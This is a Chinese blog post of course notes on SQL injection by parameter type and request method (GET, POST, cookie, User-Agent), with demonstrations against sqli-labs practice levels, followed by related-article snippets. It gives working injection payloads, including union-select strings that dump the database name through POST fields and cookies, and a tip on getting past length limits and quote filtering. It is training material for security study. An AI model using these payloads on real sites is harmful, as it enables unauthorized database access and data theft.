<小迪安全>14-SQL注入之类型及提交注入

最新推荐文章于 2024-01-04 23:22:41 发布
最新推荐文章于 2024-01-04 23:22:41 发布
阅读量101 收藏
点赞数
分类专栏: 安全入门 文章标签: sql 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackerXxxt/article/details/129441792
版权

目录

1.知识点

 2.演示实例

1.知识点

#简要明确参数类型

数字,字符,搜索,JSON等

数字可以直接加在sql中

字符就要通过单双引号接入sql语句中<闭合字符串>

#简要明确请求方法

GET, POST, COOKIE, REQUEST, HTTP头等

(request全部接受)

其中SQI语句干扰符号: ', ", %, ), } 等,具体需看写法 '"]})可以作为默认测试写法

JSON数据形式

curl -X POST https://api.zoomeye.org/user/login -d
{
"username": "foo@bar.com",
"password": "foobar"
}

 2.演示实例

#考虑单引号,双引号闭合问题--sqli5,6

?id=1 and1=1--不显示

?id=1' and '1'='1

?id=1' and '1'='2--报错

# 用post提交数据--sqli11

burpsuite抓包--也可在burp改包

uname=admin' and 1=2 union select 1,2#&password=admin&submit=Submit

uname=admin' and 1=2 union select database(),2#&password=admin&submit=Submit

#cookie--sqli20

通过源代码发现,对于提交内容,有长度限制和魔术引号过滤,这时候可以考虑cookie注入,绕过防护

Cookie:uname=admin' and 1=1 union select database(),2,3#--爆库

#server

HTTP_USE_AGENT:接受浏览器信息

在burp的User-Agent改包即可注入成功

hackerXxxt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络攻防技术——SQL注入
学习记录
02-27 3120
一、题目 SQL注入是一种代码注入技术,它利用web应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在web应用程序中正确检查时,就会出现此漏洞。许多web应用程序从用户处获取输入,然后使用这些输入构造SQL查询,这样web应用程序就可以从数据库中获取信息。Web应用程序还使用SQL查询在数据库中存储信息。这些是web应用程序开发中的常见做法。如果未仔细构造SQL查询,则可能会出现SQL注入漏洞。SQL注入攻击是对web应用程序最常见的攻击之一。 在本实验室中,我们创建了一
【小安全day14】WEB漏洞——SQL注入类型提交注入
RichUee的博客
12-06 558
在真实 SQL 注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型提交方法可以通过抓包分析获取,后续安全测试中我们也必须满足同等的操作才能进行注入
SQL 注入漏洞检测与利用
CSDN
03-31 5968
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句.
sql注入之(登录框绕过)
热门推荐
qq_42383069的博客
05-06 2万+
sql注入之(登录框绕过) 原理说明: Mysql数据库查询语句: 一般的登录框sql语句如下: select name.passwd from users where username=‘name’ and password=‘pwd’; 分析: 如果我们输入的是正确的用户名与密码,肯定就可以登陆进去,错的就不行了。但是这个验证机制可以通过SQL语句来构造一个特殊的“字符串”通过验证。 比如我们...
关于我这周学习SQL注入的一些笔记:
weixin_54105551的博客
05-28 327
sql注入的原理: 通过恶意的SQL语句插入到应用的输入参数中,再在后台数据库服务器上解析执行的攻击。 Web程序的三层结构: 界面层( User Interface layer ) 业务逻辑层( Business Logic Layer ) 数据访问层( Data access layer ) 在软件体系架构设计中,分层式结构是最常见,也是最重要的一种结构被应用于众多类型的软件开发。 有数据驱动的Web应用程序也已从三层架构的思想,也分为三层。 表示层 .
安全14 PHP 开发-个人博客项目&输入输出类&留言板&访问 IP&UA 头&来源
weixin_73760178的博客
01-04 390
这时发现我们每刷新一下,都会进行一次弹窗,原因很简单,就是每次刷新页面,都会对之前的页面进行访问,然后我们之前的写入的数据已经都被数据库所写入,所以每次刷新页面之前的数据都会重新显示,那么有js的信息将被执行——存储型XSS。首先需个人进行搭建一个个人输入输出的网页,这里我们使用一个搜索连接数据库的网页。管理网站:检测来源,过滤了攻击——从而可以伪造管理员的相关数据,进行伪造访问。使用js代码,发现进行执行了,因为当我们在搜索框中输入任意的字符,已知攻击者知道的某个管理员的习惯,喜欢看涩涩;
第14天:WEB漏洞-SQL注入类型提交注入1
08-03
本文将详细介绍SQL注入类型及其提交方式,以及如何进行安全测试。 首先,我们需要了解数据的提交类型。在Web应用中,数据可以通过多种方式传递给服务器: 1. **数字型参数**:通常用于传递数值,如ID或年龄。...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
中职网络安全题目逆向-SQL注入环境创建-题目环境
09-21
自己根据网上的题目解答,逆向制作的SQL注入的题目环境。可以根据解答方法进行练习 使用方法: 用phpstudy2016配置 将解压后的文件夹放在网站根目录下 将解压后的文件夹lpplpp(这个里面是数据库)拷贝到数据库所在...
Mybatis-SQL注入讲解及#预处理与$的区别.html
最新发布
07-12
sql注入
第8章 8.WEB安全性测试--SQL注入四.mp4
05-08
第8章 8.WEB安全性测试--SQL注入四.mp4
WEB登录防sql注入 url注入 脚本注入
12-05
WEB登录防sql注入 url注入 脚本注入
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 5989
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
「网络安全」SQL注入攻击的原理
m0_61869253的博客
03-21 619
保护产品免受SQL注入是必不可少的,以确保其正常运行并防止数据泄露。当您编写访问数据库的代码时,考虑从一开始就防止SQL注入是一种很好的做法。这是防止这些漏洞发生的最佳时机,而不是以后修补它们。开发过程应包括针对SQL注入的测试,然后是外部扫描程序。应用程序防火墙 - WAF还可以检测和阻止对您的应用程序的攻击。保护产品免受SQL注入是必不可少的,以确保其正常运行并防止数据泄露。当您编写访问数据库的代码时,考虑从一开始就防止SQL注入是一种很好的做法。
《小安全》第14天 SQL注入注入类型提交注入
m0_56250796的博客
04-26 263
JSON无论对于人,还是对于机器来说,都十分便于阅读和书写,而且相比 XML文件更小,因此迅速成为网络上十分流行的交换格式,许多网站使用JSON格式进行数据交互。Cookie注入是因为从源代码中看到到Cookie没有设置过滤,所以用Cookie注入,在实际情况中,可以通过网站指纹意外源码审计,没有源码的情况下可以先试试GET注入、POST注入,然后再试Cookie。不同的请求方法,请求的数据类型、大小都不一样。如果不按照网站接受的方式请求,注入语句将不被接受,无法代入数据库执行,注入无法攻击成功。
seedlab实验——SQL注入攻击
Yang254176的博客
07-24 1878
一、实验目的 通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施, 加强对Web攻击的防范。 二、实验原理 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。简单的说就是在post/ge
SQL注入篇——二次注入
爱国小白帽
02-10 3795
二次注入原理 二次注入是利用已存储的用户数据读取后再次进入到 SQL 查询语句中导致的注入。 ????????????☝????????有疑问欢迎写信哦 二次注入分为四步: 确定攻击目标账户名 注册恶意账户 修改恶意账户密码 使用修改的密码登录目标账户 假设知道有admin用户但不知道密码 1、首先点击New User click here? 注册admin' -- -用户 2、然后登录该用户修改密码 3、然后再...
关于SQL注入,你应该知道的那些事
weixin_33725807的博客
04-22 242
戴上你的黑帽,现在我们来学习一些关于SQL注入真正有趣的东西。请记住,你们都好好地用这些将要看到的东西,好吗? SQL注入攻击因如下几点而是一种特别有趣的冒险: 1.因为能自动规范输入的框架出现,写出易受攻击的代码变得越来越难——但我们仍然会写差劲的代码。 2.因为你使用了存储过程或者ORM框架,你不一定很清楚的是(虽然你意识到SQL注入可能穿透他们,对吗) 我们在这些保护措施之...
手工检测SQL注入漏洞
weixin_30279751的博客
03-31 3406
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,具体来说,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句,下面我们将演示SQL注入的一些原理性的东西. 数字型注入 数字型注入是...
<dependency> <groupId>com.baomidou</groupId> <artifactId>mybatis-plus-boot-starter</artifactId> <version>3.4.2</version> </dependency> 提示CVE-2022-25517 9.8 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability pending CVSS allocation 应该如何解决
06-02
这个提示是指 MyBatis Plus 存在 SQL 注入漏洞,攻击者可以通过构造恶意的 SQL 语句来获取敏感信息或者对系统造成危害。要解决这个问题,需要升级 MyBatis Plus 的版本到 3.4.3 或者更高版本,这个漏洞在这个版本中已经得到修复。同时,建议在使用 MyBatis Plus 时,遵循良好的编程习惯,比如使用预编译语句、参数化查询等方式来防止 SQL 注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值